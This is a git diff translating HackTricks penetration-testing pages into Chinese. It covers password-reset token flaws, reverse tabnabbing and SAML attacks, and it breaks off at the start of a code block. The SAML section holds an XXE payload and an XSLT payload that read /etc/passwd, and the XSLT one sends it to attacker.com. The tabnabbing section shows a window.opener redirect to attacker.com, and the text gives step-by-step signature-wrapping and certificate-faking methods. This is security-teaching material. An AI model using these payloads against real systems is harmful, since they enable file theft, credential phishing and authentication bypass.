-  - Use strong, cryptographic methods for token generation.
-  - Ensure sufficient randomness and length to prevent predictability.
-- **Tools**: Use Burp Sequencer to analyze the randomness of tokens.
+## **可猜测的UUID**
 
-## **Guessable UUID**
-
-- If UUIDs (version 1) are guessable or predictable, attackers may brute-force them to generate valid reset tokens. Check:
+- 如果UUID（版本1）是可猜测或可预测的，攻击者可能会暴力破解它们以生成有效的重置令牌。检查：
 
 {{#ref}}
 uuid-insecurities.md
 {{#endref}}
 
-- **Mitigation Steps**:
-  - Use GUID version 4 for randomness or implement additional security measures for other versions.
-- **Tools**: Use [guidtool](https://github.com/intruder-io/guidtool) for analyzing and generating GUIDs.
+- **缓解步骤**：
+- 使用GUID版本4以确保随机性，或对其他版本实施额外的安全措施。
+- **工具**：使用[guidtool](https://github.com/intruder-io/guidtool)分析和生成GUID。
 
-## **Response Manipulation: Replace Bad Response With Good One**
+## **响应操纵：用好响应替换坏响应**
 
-- Manipulating HTTP responses to bypass error messages or restrictions.
-- **Mitigation Steps**:
-  - Implement server-side checks to ensure response integrity.
-  - Use secure communication channels like HTTPS to prevent man-in-the-middle attacks.
-- **Reference**:
-  - [Critical Bug in Live Bug Bounty Event](https://medium.com/@innocenthacker/how-i-found-the-most-critical-bug-in-live-bug-bounty-event-7a88b3aa97b3)
+- 操纵HTTP响应以绕过错误消息或限制。
+- **缓解步骤**：
+- 实施服务器端检查以确保响应完整性。
+- 使用安全通信通道如HTTPS以防止中间人攻击。
+- **参考**：
+- [实时漏洞赏金活动中的关键漏洞](https://medium.com/@innocenthacker/how-i-found-the-most-critical-bug-in-live-bug-bounty-event-7a88b3aa97b3)
 
-## **Using Expired Token**
+## **使用过期令牌**
 
-- Testing whether expired tokens can still be used for password reset.
-- **Mitigation Steps**:
-  - Implement strict token expiration policies and validate token expiry server-side.
+- 测试过期令牌是否仍可用于密码重置。
+- **缓解步骤**：
+- 实施严格的令牌过期政策，并在服务器端验证令牌过期。
 
-## **Brute Force Password Reset Token**
+## **暴力破解密码重置令牌**
 
-- Attempting to brute-force the reset token using tools like Burpsuite and IP-Rotator to bypass IP-based rate limits.
-- **Mitigation Steps**:
-  - Implement robust rate-limiting and account lockout mechanisms.
-  - Monitor for suspicious activities indicative of brute-force attacks.
+- 尝试使用Burpsuite和IP-Rotator等工具暴力破解重置令牌，以绕过基于IP的速率限制。
+- **缓解步骤**：
+- 实施强大的速率限制和账户锁定机制。
+- 监控可疑活动，以指示暴力破解攻击。
 
-## **Try Using Your Token**
+## **尝试使用您的令牌**
 
-- Testing if an attacker's reset token can be used in conjunction with the victim's email.
-- **Mitigation Steps**:
-  - Ensure that tokens are bound to the user session or other user-specific attributes.
+- 测试攻击者的重置令牌是否可以与受害者的电子邮件一起使用。
+- **缓解步骤**：
+- 确保令牌绑定到用户会话或其他用户特定属性。
 
-## **Session Invalidation in Logout/Password Reset**
+## **注销/密码重置中的会话失效**
 
-- Ensuring that sessions are invalidated when a user logs out or resets their password.
-- **Mitigation Steps**:
-  - Implement proper session management, ensuring that all sessions are invalidated upon logout or password reset.
+- 确保用户注销或重置密码时会话失效。
+- **缓解步骤**：
+- 实施适当的会话管理，确保所有会话在注销或密码重置时失效。
 
-## **Session Invalidation in Logout/Password Reset**
+## **注销/密码重置中的会话失效**
 
-- Reset tokens should have an expiration time after which they become invalid.
-- **Mitigation Steps**:
-  - Set a reasonable expiration time for reset tokens and strictly enforce it server-side.
+- 重置令牌应具有过期时间，过期后将失效。
+- **缓解步骤**：
+- 为重置令牌设置合理的过期时间，并在服务器端严格执行。
 
-## References
+## 参考
 
 - [https://anugrahsr.github.io/posts/10-Password-reset-flaws/#10-try-using-your-token](https://anugrahsr.github.io/posts/10-Password-reset-flaws/#10-try-using-your-token)
 
 <figure><img src="../images/image (3).png" alt=""><figcaption></figcaption></figure>
 
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
+加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器，与经验丰富的黑客和漏洞赏金猎人交流！
 
-**Hacking Insights**\
-Engage with content that delves into the thrill and challenges of hacking
+**黑客洞察**\
+参与深入探讨黑客的刺激与挑战的内容
 
-**Real-Time Hack News**\
-Keep up-to-date with fast-paced hacking world through real-time news and insights
+**实时黑客新闻**\
+通过实时新闻和见解，跟上快速变化的黑客世界
 
-**Latest Announcements**\
-Stay informed with the newest bug bounties launching and crucial platform updates
+**最新公告**\
+及时了解最新的漏洞赏金发布和重要平台更新
 
-**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today!
+**加入我们** [**Discord**](https://discord.com/invite/N3FrSbmwdy)，今天就开始与顶级黑客合作！
 
 {{#include ../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/reverse-tab-nabbing.md b/src/pentesting-web/reverse-tab-nabbing.md
index d49763f6e..5c00ba1f7 100644
--- a/src/pentesting-web/reverse-tab-nabbing.md
+++ b/src/pentesting-web/reverse-tab-nabbing.md
@@ -1,33 +1,32 @@
 {{#include ../banners/hacktricks-training.md}}
 
-# Description
+# 描述
 
-In a situation where an **attacker** can **control** the **`href`** argument of an **`<a`** tag with the attribute **`target="_blank" rel="opener"`** that is going to be clicked by a victim, the **attacker** **point** this **link** to a web under his control (a **malicious** **website**). Then, once the **victim clicks** the link and access the attackers website, this **malicious** **website** will be able to **control** the **original** **page** via the javascript object **`window.opener`**.\
-If the page doesn't have **`rel="opener"` but contains `target="_blank"` it also doesn't have `rel="noopener"`** it might be also vulnerable.
+在一个**攻击者**可以**控制**即将被受害者点击的带有属性**`target="_blank" rel="opener"`**的**`<a`**标签的**`href`**参数的情况下，**攻击者**将此**链接**指向一个他控制的网页（一个**恶意****网站**）。然后，一旦**受害者点击**该链接并访问攻击者的网站，这个**恶意****网站**将能够通过javascript对象**`window.opener`**来**控制****原始****页面**。\
+如果页面没有**`rel="opener"`但包含`target="_blank"`且也没有`rel="noopener"`**，它也可能是脆弱的。
 
-A regular way to abuse this behaviour would be to **change the location of the original web** via `window.opener.location = https://attacker.com/victim.html` to a web controlled by the attacker that **looks like the original one**, so it can **imitate** the **login** **form** of the original website and ask for credentials to the user.
+滥用这种行为的常规方法是通过`window.opener.location = https://attacker.com/victim.html`将**原始网页**的位置更改为一个由攻击者控制的**看起来像原始网页**的网页，以便它可以**模仿**原始网站的**登录****表单**并向用户请求凭据。
 
-However, note that as the **attacker now can control the window object of the original website** he can abuse it in other ways to perform **stealthier attacks** (maybe modifying javascript events to ex-filtrate info to a server controlled by him?)
+然而，请注意，由于**攻击者现在可以控制原始网站的窗口对象**，他可以以其他方式滥用它来执行**更隐蔽的攻击**（也许修改javascript事件以将信息外泄到他控制的服务器？）
 
-# Overview
+# 概述
 
-## With back link
+## 有返回链接
 
-Link between parent and child pages when prevention attribute is not used:
+当未使用预防属性时，父页面和子页面之间的链接：
 
 ![https://owasp.org/www-community/assets/images/TABNABBING_OVERVIEW_WITH_LINK.png](https://owasp.org/www-community/assets/images/TABNABBING_OVERVIEW_WITH_LINK.png)
 
-## Without back link
+## 无返回链接
 
-Link between parent and child pages when prevention attribute is used:
+当使用预防属性时，父页面和子页面之间的链接：
 
 ![https://owasp.org/www-community/assets/images/TABNABBING_OVERVIEW_WITHOUT_LINK.png](https://owasp.org/www-community/assets/images/TABNABBING_OVERVIEW_WITHOUT_LINK.png)
 
-## Examples <a href="#examples" id="examples"></a>
-
-Create the following pages in a folder and run a web server with `python3 -m http.server`\
-Then, **access** `http://127.0.0.1:8000/`vulnerable.html, **click** on the link and note how the **original** **website** **URL** **changes**.
+## 示例 <a href="#examples" id="examples"></a>
 
+在一个文件夹中创建以下页面并运行一个web服务器，使用`python3 -m http.server`\
+然后，**访问**`http://127.0.0.1:8000/`vulnerable.html，**点击**链接并注意**原始****网站**的**URL**是如何**变化**的。
 ```markup:vulnerable.html
 <!DOCTYPE html>
 <html>
@@ -41,11 +40,11 @@ Then, **access** `http://127.0.0.1:8000/`vulnerable.html, **click** on the link
 ```markup:malicious.html
 <!DOCTYPE html>
 <html>
- <body>
-  <script>
-  window.opener.location = "http://127.0.0.1:8000/malicious_redir.html";
-  </script>
- </body>
+<body>
+<script>
+window.opener.location = "http://127.0.0.1:8000/malicious_redir.html";
+</script>
+</body>
 </html>
 ```
 
@@ -57,28 +56,26 @@ Then, **access** `http://127.0.0.1:8000/`vulnerable.html, **click** on the link
 </body>
 </html>
 ```
+## 可访问的属性 <a href="#accessible-properties" id="accessible-properties"></a>
 
-## Accessible properties <a href="#accessible-properties" id="accessible-properties"></a>
+在发生**跨源**访问的情况下（跨不同域的访问），恶意网站可以访问的**window** JavaScript 类实例的属性仅限于以下内容：
 
-In the scenario where a **cross-origin** access occurs (access across different domains), the properties of the **window** JavaScript class instance, referred to by the **opener** JavaScript object reference, that can be accessed by a malicious site are limited to the following:
+- **`opener.closed`**：此属性用于确定窗口是否已关闭，返回一个布尔值。
+- **`opener.frames`**：此属性提供对当前窗口内所有 iframe 元素的访问。
+- **`opener.length`**：此属性返回当前窗口中存在的 iframe 元素的数量。
+- **`opener.opener`**：可以通过此属性获取打开当前窗口的窗口的引用。
+- **`opener.parent`**：此属性返回当前窗口的父窗口。
+- **`opener.self`**：此属性提供对当前窗口本身的访问。
+- **`opener.top`**：此属性返回最上层的浏览器窗口。
 
-- **`opener.closed`**: This property is accessed to determine if a window has been closed, returning a boolean value.
-- **`opener.frames`**: This property provides access to all iframe elements within the current window.
-- **`opener.length`**: The number of iframe elements present in the current window is returned by this property.
-- **`opener.opener`**: A reference to the window that opened the current window can be obtained through this property.
-- **`opener.parent`**: This property returns the parent window of the current window.
-- **`opener.self`**: Access to the current window itself is provided by this property.
-- **`opener.top`**: This property returns the topmost browser window.
+然而，在域名相同的情况下，恶意网站可以访问[**window**](https://developer.mozilla.org/en-US/docs/Web/API/Window) JavaScript 对象引用所暴露的所有属性。
 
-However, in instances where the domains are identical, the malicious site gains access to all properties exposed by the [**window**](https://developer.mozilla.org/en-US/docs/Web/API/Window) JavaScript object reference.
+# 预防
 
-# Prevention
+预防信息记录在[HTML5 Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/HTML5_Security_Cheat_Sheet.html#tabnabbing)中。
 
-Prevention information are documented into the [HTML5 Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/HTML5_Security_Cheat_Sheet.html#tabnabbing).
-
-## References
+## 参考
 
 - [https://owasp.org/www-community/attacks/Reverse_Tabnabbing](https://owasp.org/www-community/attacks/Reverse_Tabnabbing)
 
 {{#include ../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/saml-attacks/README.md b/src/pentesting-web/saml-attacks/README.md
index ec9cb573f..f13fa3f52 100644
--- a/src/pentesting-web/saml-attacks/README.md
+++ b/src/pentesting-web/saml-attacks/README.md
@@ -1,32 +1,31 @@
-# SAML Attacks
+# SAML 攻击
 
-## SAML Attacks
+## SAML 攻击
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Basic Information
+## 基本信息
 
 {{#ref}}
 saml-basics.md
 {{#endref}}
 
-## Tool
+## 工具
 
-[**SAMLExtractor**](https://github.com/fadyosman/SAMLExtractor): A tool that can take a URL or list of URL and prints back SAML consume URL.
+[**SAMLExtractor**](https://github.com/fadyosman/SAMLExtractor): 一个可以接受 URL 或 URL 列表并返回 SAML 消费 URL 的工具。
 
-## XML round-trip
+## XML 往返
 
-In XML the signed part of the XML is saved in memory, then some encoding/decoding is performed and the signature is checked. Ideally that encoding/decoding shouldn't change the data but based in that scenario, **the data being checked and the original data could not be the same**.
-
-For example, check the following code:
+在 XML 中，签名部分的 XML 被保存在内存中，然后进行一些编码/解码，并检查签名。理想情况下，这种编码/解码不应该改变数据，但基于这种情况，**被检查的数据和原始数据可能不相同**。
 
+例如，检查以下代码：
 ```ruby
 require 'rexml/document'
 
 doc = REXML::Document.new <<XML
 <!DOCTYPE x [ <!NOTATION x SYSTEM 'x">]><!--'> ]>
 <X>
-  <Y/><![CDATA[--><X><Z/><!--]]>-->
+<Y/><![CDATA[--><X><Z/><!--]]>-->
 </X>
 XML
 
@@ -34,250 +33,236 @@ puts "First child in original doc: " + doc.root.elements[1].name
 doc = REXML::Document.new doc.to_s
 puts "First child after round-trip: " + doc.root.elements[1].name
 ```
-
-Running the program against REXML 3.2.4 or earlier would result in the following output instead:
-
+在 REXML 3.2.4 或更早版本上运行该程序将导致以下输出：
 ```
 First child in original doc: Y
 First child after round-trip: Z
 ```
-
-This is how REXML saw the original XML document from the program above:
+这是REXML如何查看上述程序的原始XML文档的：
 
 ![https://mattermost.com/blog/securing-xml-implementations-across-the-web/](<../../images/image (1001).png>)
 
-And this is how it saw it after a round of parsing and serialization:
+这是它在经过一轮解析和序列化后看到的：
 
 ![https://mattermost.com/blog/securing-xml-implementations-across-the-web/](<../../images/image (445).png>)
 
-For more information about the vulnerability and how to abuse it:
+有关此漏洞及其滥用方式的更多信息：
 
 - [https://mattermost.com/blog/securing-xml-implementations-across-the-web/](https://mattermost.com/blog/securing-xml-implementations-across-the-web/)
 - [https://joonas.fi/2021/08/saml-is-insecure-by-design/](https://joonas.fi/2021/08/saml-is-insecure-by-design/)
 
-## XML Signature Wrapping Attacks
+## XML签名包装攻击
 
-In **XML Signature Wrapping attacks (XSW)**, adversaries exploit a vulnerability arising when XML documents are processed through two distinct phases: **signature validation** and **function invocation**. These attacks involve altering the XML document structure. Specifically, the attacker **injects forged elements** that do not compromise the XML Signature's validity. This manipulation aims to create a discrepancy between the elements analyzed by the **application logic** and those checked by the **signature verification module**. As a result, while the XML Signature remains technically valid and passes verification, the application logic processes the **fraudulent elements**. Consequently, the attacker effectively bypasses the XML Signature's **integrity protection** and **origin authentication**, enabling the **injection of arbitrary content** without detection.
+在**XML签名包装攻击（XSW）**中，攻击者利用XML文档在两个不同阶段处理时出现的漏洞：**签名验证**和**功能调用**。这些攻击涉及改变XML文档结构。具体而言，攻击者**注入伪造元素**，这些元素不会影响XML签名的有效性。这种操控旨在造成**应用逻辑**分析的元素与**签名验证模块**检查的元素之间的差异。因此，尽管XML签名在技术上仍然有效并通过验证，但应用逻辑处理的是**欺诈元素**。因此，攻击者有效地绕过了XML签名的**完整性保护**和**来源认证**，使得**任意内容的注入**得以在不被检测的情况下进行。
 
-The following attacks ara based on [**this blog post**](https://epi052.gitlab.io/notes-to-self/blog/2019-03-13-how-to-test-saml-a-methodology-part-two/) **and** [**this paper**](https://www.usenix.org/system/files/conference/usenixsecurity12/sec12-final91.pdf). So check those for further details.
+以下攻击基于[**这篇博客文章**](https://epi052.gitlab.io/notes-to-self/blog/2019-03-13-how-to-test-saml-a-methodology-part-two/) **和** [**这篇论文**](https://www.usenix.org/system/files/conference/usenixsecurity12/sec12-final91.pdf)。因此，请查看这些以获取更多详细信息。
 
 ### XSW #1
 
-- **Strategy**: A new root element containing the signature is added.
-- **Implication**: The validator may get confused between the legitimate "Response -> Assertion -> Subject" and the attacker's "evil new Response -> Assertion -> Subject", leading to data integrity issues.
+- **策略**：添加一个包含签名的新根元素。
+- **影响**：验证器可能会在合法的“Response -> Assertion -> Subject”和攻击者的“恶意新Response -> Assertion -> Subject”之间感到困惑，从而导致数据完整性问题。
 
 ![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-1.svg](<../../images/image (506).png>)
 
 ### XSW #2
 
-- **Difference from XSW #1**: Utilizes a detached signature instead of an enveloping signature.
-- **Implication**: The "evil" structure, similar to XSW #1, aims to deceive the business logic post integrity check.
+- **与XSW #1的区别**：使用分离签名而不是封装签名。
+- **影响**：“恶意”结构，类似于XSW #1，旨在欺骗完整性检查后的业务逻辑。
 
 ![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-2.svg](<../../images/image (466).png>)
 
 ### XSW #3
 
-- **Strategy**: An evil Assertion is crafted at the same hierarchical level as the original assertion.
-- **Implication**: Intends to confuse the business logic into using the malicious data.
+- **策略**：在与原始断言相同的层级上构造一个恶意断言。
+- **影响**：旨在混淆业务逻辑以使用恶意数据。
 
 ![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-3.svg](<../../images/image (120).png>)
 
 ### XSW #4
 
-- **Difference from XSW #3**: The original Assertion becomes a child of the duplicated (evil) Assertion.
-- **Implication**: Similar to XSW #3 but alters the XML structure more aggressively.
+- **与XSW #3的区别**：原始断言成为复制（恶意）断言的子元素。
+- **影响**：与XSW #3类似，但更激进地改变XML结构。
 
 ![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-4.svg](<../../images/image (551).png>)
 
 ### XSW #5
 
-- **Unique Aspect**: Neither the Signature nor the original Assertion adhere to standard configurations (enveloped/enveloping/detached).
-- **Implication**: The copied Assertion envelopes the Signature, modifying the expected document structure.
+- **独特之处**：签名和原始断言都不符合标准配置（封装/封装/分离）。
+- **影响**：复制的断言封装签名，修改预期的文档结构。
 
 ![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-5.svg](<../../images/image (1030).png>)
 
 ### XSW #6
 
-- **Strategy**: Similar location insertion as XSW #4 and #5, but with a twist.
-- **Implication**: The copied Assertion envelopes the Signature, which then envelopes the original Assertion, creating a nested deceptive structure.
+- **策略**：与XSW #4和#5类似的位置插入，但有一个变化。
+- **影响**：复制的断言封装签名，然后封装原始断言，创建一个嵌套的欺骗结构。
 
 ![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-6.svg](<../../images/image (169).png>)
 
 ### XSW #7
 
-- **Strategy**: An Extensions element is inserted with the copied Assertion as a child.
-- **Implication**: This exploits the less restrictive schema of the Extensions element to bypass schema validation countermeasures, especially in libraries like OpenSAML.
+- **策略**：插入一个扩展元素，复制的断言作为子元素。
+- **影响**：利用扩展元素的约束较少的模式，绕过模式验证对策，特别是在像OpenSAML这样的库中。
 
 ![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-7.svg](<../../images/image (971).png>)
 
 ### XSW #8
 
-- **Difference from XSW #7**: Utilizes another less restrictive XML element for a variant of the attack.
-- **Implication**: The original Assertion becomes a child of the less restrictive element, reversing the structure used in XSW #7.
+- **与XSW #7的区别**：利用另一个约束较少的XML元素进行攻击的变体。
+- **影响**：原始断言成为约束较少元素的子元素，反转XSW #7中使用的结构。
 
 ![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-8.svg](<../../images/image (541).png>)
 
-### Tool
+### 工具
 
-You can use the Burp extension [**SAML Raider**](https://portswigger.net/bappstore/c61cfa893bb14db4b01775554f7b802e) to parse the request, apply any XSW attack you choose, and launch it.
+您可以使用Burp扩展[**SAML Raider**](https://portswigger.net/bappstore/c61cfa893bb14db4b01775554f7b802e)来解析请求，应用您选择的任何XSW攻击并发起它。
 
 ## XXE
 
-If you don't know which kind of attacks are XXE, please read the following page:
+如果您不知道XXE攻击是什么，请阅读以下页面：
 
 {{#ref}}
 ../xxe-xee-xml-external-entity.md
 {{#endref}}
 
-SAML Responses are **deflated and base64 encoded XML documents** and can be susceptible to XML External Entity (XXE) attacks. By manipulating the XML structure of the SAML Response, attackers can attempt to exploit XXE vulnerabilities. Here’s how such an attack can be visualized:
-
+SAML响应是**解压缩和base64编码的XML文档**，可能会受到XML外部实体（XXE）攻击的影响。通过操纵SAML响应的XML结构，攻击者可以尝试利用XXE漏洞。以下是这种攻击的可视化方式：
 ```xml
 <?xml version="1.0" encoding="UTF-8"?>
- <!DOCTYPE foo [
-   <!ELEMENT foo ANY >
-   <!ENTITY    file SYSTEM "file:///etc/passwd">
-   <!ENTITY dtd SYSTEM "http://www.attacker.com/text.dtd" >]>
-  <samlp:Response ... ID="_df55c0bb940c687810b436395cf81760bb2e6a92f2" ...>
-  <saml:Issuer>...</saml:Issuer>
-  <ds:Signature ...>
-    <ds:SignedInfo>
-      <ds:CanonicalizationMethod .../>
-      <ds:SignatureMethod .../>
-      <ds:Reference URI="#_df55c0bb940c687810b436395cf81760bb2e6a92f2">...</ds:Reference>
-    </ds:SignedInfo>
-    <ds:SignatureValue>...</ds:SignatureValue>
+<!DOCTYPE foo [
+<!ELEMENT foo ANY >
+<!ENTITY    file SYSTEM "file:///etc/passwd">
+<!ENTITY dtd SYSTEM "http://www.attacker.com/text.dtd" >]>
+<samlp:Response ... ID="_df55c0bb940c687810b436395cf81760bb2e6a92f2" ...>
+<saml:Issuer>...</saml:Issuer>
+<ds:Signature ...>
+<ds:SignedInfo>
+<ds:CanonicalizationMethod .../>
+<ds:SignatureMethod .../>
+<ds:Reference URI="#_df55c0bb940c687810b436395cf81760bb2e6a92f2">...</ds:Reference>
+</ds:SignedInfo>
+<ds:SignatureValue>...</ds:SignatureValue>
 [...]
 ```
+## 工具
 
-## Tools
+您还可以使用 Burp 扩展 [**SAML Raider**](https://portswigger.net/bappstore/c61cfa893bb14db4b01775554f7b802e) 从 SAML 请求生成 POC，以测试可能的 XXE 漏洞和 SAML 漏洞。
 
-You can also use the Burp extension [**SAML Raider**](https://portswigger.net/bappstore/c61cfa893bb14db4b01775554f7b802e) to generate the POC from a SAML request to test for possible XXE vulnerabilities and SAML vulnerabilities.
+还可以查看这个演讲: [https://www.youtube.com/watch?v=WHn-6xHL7mI](https://www.youtube.com/watch?v=WHn-6xHL7mI)
 
-Check also this talk: [https://www.youtube.com/watch?v=WHn-6xHL7mI](https://www.youtube.com/watch?v=WHn-6xHL7mI)
+## 通过 SAML 的 XSLT
 
-## XSLT via SAML
-
-For more information about XSLT go to:
+有关 XSLT 的更多信息，请访问：
 
 {{#ref}}
 ../xslt-server-side-injection-extensible-stylesheet-language-transformations.md
 {{#endref}}
 
-Extensible Stylesheet Language Transformations (XSLT) can be used for transforming XML documents into various formats like HTML, JSON, or PDF. It's crucial to note that **XSLT transformations are performed before the verification of the digital signature**. This means that an attack can be successful even without a valid signature; a self-signed or invalid signature is sufficient to proceed.
-
-Here you can find a **POC** to check for this kind of vulnerabilities, in the hacktricks page mentioned at the beginning of this section you can find for payloads.
+可扩展样式表语言转换 (XSLT) 可用于将 XML 文档转换为各种格式，如 HTML、JSON 或 PDF。重要的是要注意 **XSLT 转换在数字签名验证之前执行**。这意味着即使没有有效的签名，攻击也可以成功；自签名或无效签名足以继续。
 
+在这里，您可以找到一个 **POC** 来检查这种类型的漏洞，在本节开头提到的 hacktricks 页面中，您可以找到有效载荷。
 ```xml
 <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
-  ...
-    <ds:Transforms>
-      <ds:Transform>
-        <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
-          <xsl:template match="doc">
-            <xsl:variable name="file" select="unparsed-text('/etc/passwd')"/>
-            <xsl:variable name="escaped" select="encode-for-uri($file)"/>
-            <xsl:variable name="attackerUrl" select="'http://attacker.com/'"/>
-            <xsl:variable name="exploitUrl" select="concat($attackerUrl,$escaped)"/>
-            <xsl:value-of select="unparsed-text($exploitUrl)"/>
-          </xsl:template>
-        </xsl:stylesheet>
-      </ds:Transform>
-    </ds:Transforms>
-  ...
+...
+<ds:Transforms>
+<ds:Transform>
+<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
+<xsl:template match="doc">
+<xsl:variable name="file" select="unparsed-text('/etc/passwd')"/>
+<xsl:variable name="escaped" select="encode-for-uri($file)"/>
+<xsl:variable name="attackerUrl" select="'http://attacker.com/'"/>
+<xsl:variable name="exploitUrl" select="concat($attackerUrl,$escaped)"/>
+<xsl:value-of select="unparsed-text($exploitUrl)"/>
+</xsl:template>
+</xsl:stylesheet>
+</ds:Transform>
+</ds:Transforms>
+...
 </ds:Signature>
 ```
-
 ### Tool
 
-You can also use the Burp extension [**SAML Raider**](https://portswigger.net/bappstore/c61cfa893bb14db4b01775554f7b802e) to generate the POC from a SAML request to test for possible XSLT vulnerabilities.
+您还可以使用 Burp 扩展 [**SAML Raider**](https://portswigger.net/bappstore/c61cfa893bb14db4b01775554f7b802e) 从 SAML 请求生成 POC，以测试可能的 XSLT 漏洞。
 
-Check also this talk: [https://www.youtube.com/watch?v=WHn-6xHL7mI](https://www.youtube.com/watch?v=WHn-6xHL7mI)
+还可以查看这个演讲: [https://www.youtube.com/watch?v=WHn-6xHL7mI](https://www.youtube.com/watch?v=WHn-6xHL7mI)
 
 ## XML Signature Exclusion <a href="#xml-signature-exclusion" id="xml-signature-exclusion"></a>
 
-The **XML Signature Exclusion** observes the behavior of SAML implementations when the Signature element is not present. If this element is missing, **signature validation may not occur**, making it vulnerable. It's possibel to test this by altering the contents that are usually verified by the signature.
+**XML Signature Exclusion** 观察 SAML 实现的行为，当 Signature 元素缺失时。如果该元素缺失，**签名验证可能不会发生**，使其变得脆弱。可以通过更改通常由签名验证的内容来测试这一点。
 
 ![https://epi052.gitlab.io/notes-to-self/img/saml/signature-exclusion.svg](<../../images/image (457).png>)
 
 ### Tool <a href="#xml-signature-exclusion-how-to" id="xml-signature-exclusion-how-to"></a>
 
-You can also use the Burp extension [**SAML Raider**](https://portswigger.net/bappstore/c61cfa893bb14db4b01775554f7b802e). Intercept the SAML Response and click `Remove Signatures`. In doing so **all** Signature elements are removed.
+您还可以使用 Burp 扩展 [**SAML Raider**](https://portswigger.net/bappstore/c61cfa893bb14db4b01775554f7b802e)。拦截 SAML 响应并点击 `Remove Signatures`。这样，**所有** Signature 元素将被移除。
 
-With the signatures removed, allow the request to proceed to the target. If the Signature isn’t required by the Service
+在移除签名后，允许请求继续发送到目标。如果服务不需要签名
 
 ## Certificate Faking <a href="#certificate-faking" id="certificate-faking"></a>
 
 ## Certificate Faking
 
-Certificate Faking is a technique to test if a **Service Provider (SP) properly verifies that a SAML Message is signed** by a trusted Identity Provider (IdP). It involves using a \***self-signed certificate** to sign the SAML Response or Assertion, which helps in evaluating the trust validation process between SP and IdP.
+Certificate Faking 是一种测试 **服务提供者 (SP) 是否正确验证 SAML 消息是否由受信任的身份提供者 (IdP) 签名** 的技术。它涉及使用 \***自签名证书** 来签署 SAML 响应或声明，这有助于评估 SP 和 IdP 之间的信任验证过程。
 
-### How to Conduct Certificate Faking
+### 如何进行 Certificate Faking
 
-The following steps outline the process using the [SAML Raider](https://portswigger.net/bappstore/c61cfa893bb14db4b01775554f7b802e) Burp extension:
+以下步骤概述了使用 [SAML Raider](https://portswigger.net/bappstore/c61cfa893bb14db4b01775554f7b802e) Burp 扩展的过程：
 
-1. Intercept the SAML Response.
-2. If the response contains a signature, send the certificate to SAML Raider Certs using the `Send Certificate to SAML Raider Certs` button.
-3. In the SAML Raider Certificates tab, select the imported certificate and click `Save and Self-Sign` to create a self-signed clone of the original certificate.
-4. Go back to the intercepted request in Burp’s Proxy. Select the new self-signed certificate from the XML Signature dropdown.
-5. Remove any existing signatures with the `Remove Signatures` button.
-6. Sign the message or assertion with the new certificate using the **`(Re-)Sign Message`** or **`(Re-)Sign Assertion`** button, as appropriate.
-7. Forward the signed message. Successful authentication indicates that the SP accepts messages signed by your self-signed certificate, revealing potential vulnerabilities in the validation process of the SAML messages.
+1. 拦截 SAML 响应。
+2. 如果响应包含签名，使用 `Send Certificate to SAML Raider Certs` 按钮将证书发送到 SAML Raider Certs。
+3. 在 SAML Raider 证书选项卡中，选择导入的证书并点击 `Save and Self-Sign` 创建原始证书的自签名克隆。
+4. 返回 Burp 的代理中拦截的请求。从 XML Signature 下拉菜单中选择新的自签名证书。
+5. 使用 `Remove Signatures` 按钮移除任何现有签名。
+6. 使用 **`(Re-)Sign Message`** 或 **`(Re-)Sign Assertion`** 按钮（视情况而定）使用新证书签署消息或声明。
+7. 转发签名消息。成功的身份验证表明 SP 接受由您的自签名证书签署的消息，揭示 SAML 消息验证过程中的潜在漏洞。
 
 ## Token Recipient Confusion / Service Provider Target Confusion <a href="#token-recipient-confusion" id="token-recipient-confusion"></a>
 
-Token Recipient Confusion and Service Provider Target Confusion involve checking whether the **Service Provider correctly validates the intended recipient of a response**. In essence, a Service Provider should reject an authentication response if it was meant for a different provider. The critical element here is the **Recipient** field, found within the **SubjectConfirmationData** element of a SAML Response. This field specifies a URL indicating where the Assertion must be sent. If the actual recipient does not match the intended Service Provider, the Assertion should be deemed invalid.
+Token Recipient Confusion 和 Service Provider Target Confusion 涉及检查 **服务提供者是否正确验证响应的预期接收者**。本质上，如果身份验证响应是针对不同提供者的，服务提供者应该拒绝该响应。这里的关键元素是 **Recipient** 字段，位于 SAML 响应的 **SubjectConfirmationData** 元素中。该字段指定一个 URL，指示声明必须发送到哪里。如果实际接收者与预期的服务提供者不匹配，则该声明应被视为无效。
 
-#### **How It Works**
+#### **工作原理**
 
-For a SAML Token Recipient Confusion (SAML-TRC) attack to be feasible, certain conditions must be met. Firstly, there must be a valid account on a Service Provider (referred to as SP-Legit). Secondly, the targeted Service Provider (SP-Target) must accept tokens from the same Identity Provider that serves SP-Legit.
-
-The attack process is straightforward under these conditions. An authentic session is initiated with SP-Legit via the shared Identity Provider. The SAML Response from the Identity Provider to SP-Legit is intercepted. This intercepted SAML Response, originally intended for SP-Legit, is then redirected to SP-Target. Success in this attack is measured by SP-Target accepting the Assertion, granting access to resources under the same account name used for SP-Legit.
+为了使 SAML Token Recipient Confusion (SAML-TRC) 攻击可行，必须满足某些条件。首先，服务提供者上必须有一个有效的帐户（称为 SP-Legit）。其次，目标服务提供者（SP-Target）必须接受来自同一身份提供者的令牌，该身份提供者为 SP-Legit 提供服务。
 
+在这些条件下，攻击过程是简单的。通过共享的身份提供者与 SP-Legit 启动一个真实会话。拦截身份提供者到 SP-Legit 的 SAML 响应。然后将该拦截的 SAML 响应（原本是针对 SP-Legit 的）重定向到 SP-Target。攻击成功的标准是 SP-Target 接受该声明，从而允许访问与 SP-Legit 使用的相同帐户名下的资源。
 ```python
 # Example to simulate interception and redirection of SAML Response
